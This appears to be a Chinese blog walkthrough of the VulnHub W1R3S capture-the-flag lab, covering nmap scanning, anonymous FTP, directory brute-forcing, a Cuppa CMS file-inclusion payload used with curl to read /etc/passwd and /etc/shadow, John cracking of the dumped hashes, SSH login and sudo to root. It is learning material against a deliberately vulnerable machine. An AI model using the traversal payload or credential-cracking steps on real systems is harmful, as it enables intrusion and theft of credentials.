最新要闻

广告

手机

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

家电

当前热文:W1R3S

来源:博客园

W1R3S

  • 下载地址


    (资料图片)

    https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
  • 安装

    • 直接丢到vm中

1、主机发现

sudo nmap -sn 10.200.32.0/24
  • 在靶机开启之前,用Nmap扫描一下
  • 开启后,在进行扫描
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:00 CST                                                                                                                      │Nmap scan report for 10.200.32.2                                                                                                                      │Host is up (0.00017s latency).                                                                                                                      │MAC Address: 00:50:56:FB:FF:43 (VMware)                                                                                                                      │Nmap scan report for 10.200.32.129                                                                                                                      │Host is up (0.000063s latency).                                                                                                                      │MAC Address: 00:0C:29:4D:89:EC (VMware)                                                                                                                      │Nmap scan report for 10.200.32.254                                                                                                                      │Host is up (0.00011s latency).                                                                                                                      │MAC Address: 00:50:56:E2:B0:10 (VMware)                                                                                                                      │Nmap scan report for 10.200.32.128                                                                                                                      │Host is up.                                                                                                                      │Nmap done: 256 IP addresses (4 hosts up) scanned in 27.90 seconds

2、端口扫描

第一次扫描

sudo nmap --min-rate 10000 -p- 10.200.32.129Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:08 CSTNmap scan report for 10.200.32.129Host is up (0.00029s latency).Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh80/tcp   open  http3306/tcp open  mysqlMAC Address: 00:0C:29:4D:89:EC (VMware)Nmap done: 1 IP address (1 host up) scanned in 25.39 seconds
  • 要求全
  • 最少扫两遍,防止网络问题出现波动

第二次扫描

sudo nmap -sT -sV -O -p 21,22,80,3306 10.200.32.129Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:10 CSTNmap scan report for 10.200.32.129Host is up (0.00051s latency).PORT     STATE SERVICE VERSION21/tcp   open  ftp     vsftpd 2.0.8 or later22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))3306/tcp open  mysql   MySQL (unauthorized)MAC Address: 00:0C:29:4D:89:EC (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 3.X|4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 5.1Network Distance: 1 hopService Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 26.11 secondssudo nmap -sU -p 21,22,80,3306 10.200.32.129Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:14 CSTNmap scan report for 10.200.32.129Host is up (0.00029s latency).PORT     STATE         SERVICE21/udp   open|filtered ftp22/udp   open|filtered ssh80/udp   open|filtered http3306/udp closed        mysqlMAC Address: 00:0C:29:4D:89:EC (VMware)Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
  • -sT 以TCP形式扫描, -sV扫描端口服务的版本, -O 查看扫描系统

  • 用UDP 扫描一下,-sU 以UDP形式扫描一下

  • 端口分析:

    优先级选择:21,80,3306,22

    ftp 简单, 80端口是重点

第三次扫描

使用NMAP的漏洞扫描

sudo nmap --script=vuln -p 21,22,80,3306 10.200.32.129
PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh80/tcp   open  http|_http-stored-xss: Couldn"t find any stored XSS vulnerabilities.| http-enum: |_  /wordpress/wp-login.php: Wordpress login page.|_http-dombased-xss: Couldn"t find any DOM based XSS.|_http-csrf: Couldn"t find any CSRF vulnerabilities.| http-slowloris-check: |   VULNERABLE:|   Slowloris DOS attack|     State: LIKELY VULNERABLE|     IDs:  CVE:CVE-2007-6750|       Slowloris tries to keep many connections to the target web server open and hold|       them open as long as possible.  It accomplishes this by opening connections to|       the target web server and sending a partial request. By doing so, it starves|       the http server"s resources causing Denial Of Service.|       |     Disclosure date: 2009-09-17|     References:|       http://ha.ckers.org/slowloris/|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-67503306/tcp open  mysqlMAC Address: 00:0C:29:4D:89:EC (VMware)
  • DOS攻击
  • wordpress搭建的东西

每个攻击向量最多不超过20分钟

3、FTP方向

ftp 10.200.32.129
Connected to 10.200.32.129.220 Welcome to W1R3S.inc FTP service.Name (10.200.32.129:kali): anonymous331 Please specify the password.Password: 230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.
  • 使用匿名登录 anonymous
ftp> ls229 Entering Extended Passive Mode (|||45817|)150 Here comes the directory listing.drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 contentdrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docsdrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees226 Directory send OK.ftp> cd content250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||49057|)150 Here comes the directory listing.-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt226 Directory send OK.ftp> mget 0*.txtmget 01.txt [anpqy?]? 229 Entering Extended Passive Mode (|||42914|)150 Opening BINARY mode data connection for 01.txt (29 bytes).100% |***********************************************************************************************************************************************************************************************|    29        0.29 KiB/s    00:00 ETA226 Transfer complete.29 bytes received in 00:00 (0.29 KiB/s)mget 02.txt [anpqy?]? 229 Entering Extended Passive Mode (|||47040|)150 Opening BINARY mode data connection for 02.txt (165 bytes).100% |***********************************************************************************************************************************************************************************************|   165        9.09 KiB/s    00:00 ETA226 Transfer complete.165 bytes received in 00:00 (7.82 KiB/s)mget 03.txt [anpqy?]? 229 Entering Extended Passive Mode (|||40937|)150 Opening BINARY mode data connection for 03.txt (582 bytes).100% |***********************************************************************************************************************************************************************************************|   582      458.35 KiB/s    00:00 ETA226 Transfer complete.582 bytes received in 00:00 (294.94 KiB/s)ftp>cd ..250 Directory successfully changed.ftp> cd docs250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||45086|)150 Here comes the directory listing.-rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt226 Directory send OK.ftp> get worktodo.txtlocal: worktodo.txt remote: worktodo.txt229 Entering Extended Passive Mode (|||48274|)150 Opening BINARY mode data connection for worktodo.txt (138 bytes).100% |***********************************************************************************************************************************************************************************************|   138        8.52 KiB/s    00:00 ETA226 Transfer complete.138 bytes received in 00:00 (8.14 KiB/s)ftp> cd ..250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||45998|)150 Here comes the directory listing.drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 contentdrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docsdrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees226 Directory send OK.ftp> cd new-employees250 Directory successfully changed.ftp> ls229 Entering Extended Passive Mode (|||40652|)150 Here comes the directory listing.-rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt226 Directory send OK.ftp> get employee-names.txtlocal: employee-names.txt remote: employee-names.txt229 Entering Extended Passive Mode (|||48673|)150 Opening BINARY mode data connection for employee-names.txt (155 bytes).100% |***********************************************************************************************************************************************************************************************|   155        5.12 KiB/s    00:00 ETAz`226 Transfer complete.155 bytes received in 00:00 (5.00 KiB/s)ftp> binary200 Switching to Binary mode.ftp> quit
  • 最后执行binary命令防止文件无法读取

  • 发现了五个文件

    1.txt,2.txt,3.txt,employee-names.txt,worktodo.txt

分别查看

  • 01.txt

    cat 01.txt   New FTP Server For W1R3S.inc
  • 02.txt

    ########01ec2d8fc11c493b25029fb1f47f39ce#############SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
    • 使用hash-indentifier识别加密方式

      (kali㉿kali)-[~]└─$ hash-identifier "01ec2d8fc11c493b25029fb1f47f39ce"     
      Possible Hashs:[+] MD5[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
      • 第一个可能是MD5,去在线网站md5解密
      This is not a password
      • 第二个:
      ──(kali㉿kali)-[~]└─$ hash-identifier "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=="
      Not Found.
      • 感觉像base64编码,试一下
      ┌──(kali㉿kali)-[~]└─$ echo "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -d It is easy, but not that easy..                                                   

      正确√

  • 03.txt

    └─$ cat 03.txt ___________.__              __      __  ______________________   _________    .__               \__    ___/|  |__   ____   /  \    /  \/_   \______   \_____  \ /   _____/    |__| ____   ____    |    |   |  |  \_/ __ \  \   \/\/   / |   ||       _/ _(__  < \_____  \     |  |/    \_/ ___\   |    |   |   Y  \  ___/   \        /  |   ||    |   \/       \/        \    |  |   |  \  \___   |____|   |___|  /\___  >   \__/\  /   |___||____|_  /______  /_______  / /\ |__|___|  /\___  >                \/     \/         \/                \/       \/        \/  \/         \/     \/ 

    无意义

  • employee-names.txt

    $ cat employee-names.txt The W1R3S.inc employee listNaomi.W - ManagerHector.A - IT DeptJoseph.G - Web DesignAlbert.O - Web DesignGina.L - InventoryRico.D - Human Resources
  • worktodo.txt

    cat worktodo.txt              ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
    • 类似于字符翻转

    web :https://www.upsidedowntext.com/

    ı don"t thınk thıs ıs the way to root!we have a ןot of work to do‘ stop pןayıng around˙˙˙˙

4、web方向

  • 查看界面:

    http://10.200.32.129/

  • 在用nmap做端口扫描的时候,我们发现有wordpress这个cms,尝试从这下手

  • 目录爆破

    feroxbuster -u http://10.200.32.129 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 
    • 常用工具:gobuster,dirb、feroxbuster
    [####################] - 19s    30000/30000   1684/s  http://10.200.32.129/ [####################] - 38s    30000/30000   800/s   http://10.200.32.129/javascript/ [####################] - 29s    30000/30000   1065/s  http://10.200.32.129/wordpress/ [####################] - 32s    30000/30000   953/s   http://10.200.32.129/administrator/ [####################] - 27s    30000/30000   1278/s  http://10.200.32.129/javascript/jquery/ [####################] - 30s    30000/30000   1005/s  http://10.200.32.129/administrator/templates/ [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/media/ => Directory listing (add -e to scan)[####################] - 25s    30000/30000   1217/s  http://10.200.32.129/administrator/js/ [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/language/ => Directory listing (add -e to scan)[####################] - 32s    30000/30000   933/s   http://10.200.32.129/administrator/components/ [####################] - 26s    30000/30000   1149/s  http://10.200.32.129/administrator/installation/ [####################] - 25s    30000/30000   1186/s  http://10.200.32.129/administrator/classes/ [####################] - 29s    30000/30000   1081/s  http://10.200.32.129/administrator/components/stats/ [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/classes/ajax/ => Directory listing (add -e to scan)[####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/installation/html/ => Directory listing (add -e to scan)[####################] - 25s    30000/30000   1288/s  http://10.200.32.129/wordpress/wp-content/ [####################] - 15s    30000/30000   1896/s  http://10.200.32.129/wordpress/wp-admin/ [####################] - 0s     30000/30000   0/s     http://10.200.32.129/wordpress/wp-includes/ => Directory listing (add -e to scan)[####################] - 29s    30000/30000   1049/s  http://10.200.32.129/administrator/templates/default/ [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/js/jquery/ => Directory listing (add -e to scan)[####################] - 24s    30000/30000   1533/s  http://10.200.32.129/wordpress/wp-content/plugins/ [####################] - 28s    30000/30000   1113/s  http://10.200.32.129/wordpress/wp-content/themes/ [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/js/tiny_mce/ => Directory listing (add -e to scan)[####################] - 0s     30000/30000   0/s     http://10.200.32.129/wordpress/wp-content/uploads/ => Directory listing (add -e to scan)[####################] - 19s    30000/30000   1697/s  http://10.200.32.129/administrator/api/ [####################] - 23s    30000/30000   1287/s  http://10.200.32.129/administrator/components/permissions/ 
  • 查看 wordpress

    404

  • 查看 http://10.200.32.129/administrator/installation/

测试过后,发现不行。但是出了一个新的CMS---cuppa

  • 使用searchsploit 查看是否存在简单漏洞

    searchsploit cuppa cms 
    searchsploit cuppa cms--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                                                                                   |  Path--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Cuppa CMS - "/alertConfigField.php" Local/Remote File Inclusion                                                                                                                  | php/webapps/25971.txt--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results

    先下载下来

    searchsploit -m 25971.txt

    有一个简单的漏洞,测试一下。通过多次测试发现可行。playload如下

    http://10.200.32.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

    但是,没有显示任何东西。查看文档发现,可能存在编码或请求不同的问题

    尝试用curl试一下

    └─$ sudo curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://10.200.32.129/administrator/alerts/alertConfigField.php | html2text  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  4414  100  4347  100    67   298k   4706 --:--:-- --:--:-- --:--:--  307kConfiguration:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System(admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd TimeSynchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemdNetwork Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/falsecolord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/falsespeech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/falsekernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/falseusbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQLServer,,,:/nonexistent:/bin/false                                    

    发现可以

    看看能不能拿到shadow(存储用户密码的文件)

    root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::daemon:*:17379:0:99999:7:::bin:*:17379:0:99999:7:::sys:*:17379:0:99999:7:::sync:*:17379:0:99999:7:::games:*:17379:0:99999:7:::man:*:17379:0:99999:7:::lp:*:17379:0:99999:7:::mail:*:17379:0:99999:7:::news:*:17379:0:99999:7:::uucp:*:17379:0:99999:7:::proxy:*:17379:0:99999:7:::www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::backup:*:17379:0:99999:7:::list:*:17379:0:99999:7:::irc:*:17379:0:99999:7:::gnats:*:17379:0:99999:7:::nobody:*:17379:0:99999:7:::systemd-timesync:*:17379:0:99999:7:::systemd-network:*:17379:0:99999:7:::systemd-resolve:*:17379:0:99999:7:::systemd-bus-proxy:*:17379:0:99999:7:::syslog:*:17379:0:99999:7:::_apt:*:17379:0:99999:7:::messagebus:*:17379:0:99999:7:::uuidd:*:17379:0:99999:7:::lightdm:*:17379:0:99999:7:::whoopsie:*:17379:0:99999:7:::avahi-autoipd:*:17379:0:99999:7:::avahi:*:17379:0:99999:7:::dnsmasq:*:17379:0:99999:7:::colord:*:17379:0:99999:7:::speech-dispatcher:!:17379:0:99999:7:::hplip:*:17379:0:99999:7:::kernoops:*:17379:0:99999:7:::pulse:*:17379:0:99999:7:::rtkit:*:17379:0:99999:7:::saned:*:17379:0:99999:7:::usbmux:*:17379:0:99999:7:::w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::sshd:*:17554:0:99999:7:::ftp:*:17554:0:99999:7:::mysql:!:17554:0:99999:7:::

    存储下来,并用John破解

    (www-data)     Almost done: Processing the remaining buffered candidate passwords, if any.Proceeding with wordlist:/usr/share/john/password.lstcomputer         (w1r3s)     

    尝试用ssh连接

    sudo ssh w1r3s@10.200.32.129
    sudo ssh w1r3s@10.200.32.129The authenticity of host "10.200.32.129 (10.200.32.129)" can"t be established.ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added "10.200.32.129" (ED25519) to the list of known hosts.----------------------Think this is the way?----------------------Well,........possibly.----------------------w1r3s@10.200.32.129"s password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64) * Documentation:  https://help.ubuntu.com * Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage102 packages can be updated.0 updates are security updates.New release "18.04.6 LTS" available.Run "do-release-upgrade" to upgrade to it......You made it huh?....Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35

5、提权

sudo -l     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser w1r3s may run the following commands on W1R3S:    (ALL : ALL) ALL

发现,我们获得的账户就是root。

w1r3s@W1R3S:~$ sudo -isudo: unable to resolve host W1R3Sroot@W1R3S:~# lsflag.txtroot@W1R3S:~# cat flag.txt -----------------------------------------------------------------------------------------   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____    / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___|  | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \  | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/                                                                                         -----------------------------------------------------------------------------------------                          .-----------------TTTT_-----_______                        /""""""""""(______O] ----------____  \______/]_     __...---""""\_ --""   Q                               ___________@ |"""                   ._   _______________=---------""""""" |                ..--""|   l L |_l   | |          ..--""      .  /-___j "   " |    ..--""           /  ,       "   " |--""                /           `    \                      L__"         \    -                                    -    "-.                                     ".    /                                       "-./----------------------------------------------------------------------------------------  YOU HAVE COMPLETED THE               __      __  ______________________   _________              /  \    /  \/_   \______   \_____  \ /   _____/              \   \/\/   / |   ||       _/ _(__  < \_____  \                \        /  |   ||    |   \/       \/        \                \__/\  /   |___||____|_  /______  /_______  /.INC                     \/                \/       \/        \/        CHALLENGE, V 1.0----------------------------------------------------------------------------------------CREATED BY SpecterWires-----------------

关键词: